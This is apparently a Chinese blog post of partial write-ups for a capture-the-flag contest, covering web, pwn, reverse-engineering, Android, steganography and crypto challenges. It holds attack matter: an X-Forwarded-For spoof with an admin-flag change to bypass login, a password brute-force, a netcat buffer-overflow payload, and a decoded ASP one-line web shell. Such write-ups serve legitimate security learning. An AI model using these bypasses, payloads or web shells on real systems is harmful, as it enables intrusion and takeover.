whalectf 部分writeup

Web

Find me 右键查看源码flag:{This_is_s0_simpl3}

密码泄露
http://39.107.92.230/web/web5/password.txt发现密码字典
爆破发现长度不一样的密码:Nsf0cuS
源码中截断了5位,修改请求包,将密码改为Nsf0cuS,返回这里没有flag字样
发现cookies:newpage=MjkwYmNhNzBjN2RhZTkzZGI2NjQ0ZmEwMGI5ZdgzYjkucGhw
Base64解290bca70c7dae93db6644fa00b9d83b9.php
进入为留言板,然后这里写图片描述

本地登录 抓包 添加X-Forwarded-For: 127.0.0.1,isadmin改为1
flag:{Why_ar3_y0u_s0_dia0}

http这里写图片描述

Pwn1
脚本:cat <(python -c “print ‘\x11’*40+’\x34\x12\xcd\xab’”) - | nc bamboofox.cs.nctu.edu.tw 22001
这里写图片描述
参考:http://www.secist.com/archives/3619.html
https://blog.csdn.net/CJ_Kano/article/details/42404985
这里写图片描述

R100
Python脚本
这里写图片描述
Password为Code_Talkers,但是提交不对、

Re 逆向练习
OD调试KEY{e2s6ry3r5s8f6 共17位,
单步调试
再打开IDA发现后几位未1024}
Flag为KEY{e2s6ry3r5s8f61024}

后面的比较简单,没上传图,觉得麻烦,需要就看下,不需要就算了,还有很多难点的没做出来———有空继续
Re
1. PE格式
PETool打开
块数目 0x0004
时间戳 0x591D5CCC
入口地址 0x0005B789
便是 0x0103
组合下
BJWXB_CTF{0004h-591D5CCCh-0005B789h-0103h}
2.Re warmup100 简单的异或

调试后发现是异或

算出BJWXB_CTF{W4rm_UP_warm_up_WARM_UP!}

  1. Re100 app-release 拖入jeb 发现是byte异或
    print(enc(“PXEJPMQFTiS|v\"#vMDwKMA3_b~w3o”, 18))
    计算BJWXB_CTF{Andr01d_VerY_S!Mple!}

Android1:

Jeb打开发现,byte[]=aHR0cDovLzQ1LjMyLjQ3Ljk4
,base64解码得http://45.32.47.98,,flag为ip

Android05
enc(jeb打开一串字符串,15) #异或

android09

找到该方法,gevalue()反回值是20000,符合要求,所以只需修改判断处得标识,使执行,修改11,flag{11}

杂项
流量分析100

Tcp流追踪下载原始数据
得到 ,winhex打开doc发现key
key{23ac600a11eaffc8}
decode 3
JavaScript 代码转换,直接将其在控制台执行得flag=itisjavascriptenjoy%21
其中%21=!

Decode8
flag{Just_4_fun_0.0}
https://www.cnblogs.com/zqh20145320/p/5710072.html
ascii表得整体凯撒移动

Decode9
Flag{? enusCtf }
参见https://blog.csdn.net/lanvnal/article/details/54635612
控制台运行得到:┼攠數畣整爠煥敵瑳∨?湥獵瑃≦┩
把上面这串复制到记事本,另存为,编码选上“Unicode”,关闭。用WinHex等可以查看16进制的软件,直接打开,一目了然。如果想显示正常,把开头的FF FE两个字节删了,再用记事本打开就看到了。木马为 <% execute request(“? enusCtf”)%

隐写
Find 50
拖入stegSolve,发现二维码层,扫描即可得

被我吃了50
Binwalk一看,修改后缀为.zip,解压即可得flag.txt

 合体鲸鱼
Frame browser

亚种50
Winhex直接打开flag{firsttry}

下雨天50 上工具StegSolve,好几个都是直接这工具就出来了、、、

愤怒得小猪100
扫码

真是动态图100
修改头格式,将9a改为GIF89a,打开是动态图,stegsolve分层看是base64编码,
组合为
Y2F0Y2hfdGh1X2R5bmFtaWNfZmxhZ19pc19xdW10ZV9zaW1wbGU=
解压catch_thu_dynamic_flag_is_qumte_simple,提交不对
改下key{catch_the_dynamic_flag_is_quite_simple},Ok!

密码学
德军密码(二进制密码)
KEY{YAHKR} 小写输入不对,不知道为啥

密钥生成
上脚本
d= 125631357777427553
rsa破解
通过公钥解密
openssl rsa -pubin -text -modulus -in warmup -in public.pem
得到n= 0xA41006DEFD378B7395B4E2EB1EC9BF56A61CD9C3B5A0A73528521EEB2FB817A7、
E= 65537 (0x10001)

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
基于BERT构建新闻文本分类模型,并结合node.js + vue完成了一个可视化界面。 爬虫(Web Crawler)是一种自动化程序,用于从互联网上收集信息。其主要功能是访问网页、提取数据并存储,以便后续分析或展示。爬虫通常由搜索引擎、数据挖掘工具、监测系统等应用于网络数据抓取的场景。 爬虫的工作流程包括以下几个关键步骤: URL收集: 爬虫从一个或多个初始URL开始,递归或迭代地发现新的URL,构建一个URL队列。这些URL可以通过链接分析、站点地图、搜索引擎等方式获取。 请求网页: 爬虫使用HTTP或其他协议向目标URL发起请求,获取网页的HTML内容。这通常通过HTTP请求库实现,如Python中的Requests库。 解析内容: 爬虫对获取的HTML进行解析,提取有用的信息。常用的解析工具有正则表达式、XPath、Beautiful Soup等。这些工具帮助爬虫定位和提取目标数据,如文本、图片、链接等。 数据存储: 爬虫将提取的数据存储到数据库、文件或其他存储介质中,以备后续分析或展示。常用的存储形式包括关系型数据库、NoSQL数据库、JSON文件等。 遵守规则: 为避免对网站造成过大负担或触发反爬虫机制,爬虫需要遵守网站的robots.txt协议,限制访问频率和深度,并模拟人类访问行为,如设置User-Agent。 反爬虫应对: 由于爬虫的存在,一些网站采取了反爬虫措施,如验证码、IP封锁等。爬虫工程师需要设计相应的策略来应对这些挑战。 爬虫在各个领域都有广泛的应用,包括搜索引擎索引、数据挖掘、价格监测、新闻聚合等。然而,使用爬虫需要遵守法律和伦理规范,尊重网站的使用政策,并确保对被访问网站的服务器负责。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值